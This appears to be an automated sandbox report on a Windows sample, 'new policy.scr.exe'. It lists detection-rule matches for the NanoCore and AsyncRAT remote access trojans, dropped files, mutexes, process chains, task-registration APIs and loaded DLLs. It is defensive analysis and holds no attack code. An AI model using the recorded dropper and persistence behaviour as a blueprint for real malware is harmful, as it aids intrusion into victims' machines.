Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: airlineagancy.casacam.net 7076.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: airlineagancy.casacam.net 7076.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/9@19/1

Source: C:\Users\user\Desktop\new policy.scr.exe

File created: C:\Users\user\AppData\Roaming\Networks!.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Mutant created: \Sessions\1\BaseNamedObjects\BGCigTdLypaes6Nr
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\new policy.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{7065c9a5-e7ef-4b4a-9ad2-3b36dc826073}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03

Source: C:\Users\user\Desktop\new policy.scr.exe

File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe

Jump to behavior

Source: new policy.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: new policy.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\new policy.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: new policy.scr.exe	ReversingLabs: Detection: 55%
Source: new policy.scr.exe	Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\new policy.scr.exe

File read: C:\Users\user\Desktop\new policy.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll	Jump to behavior
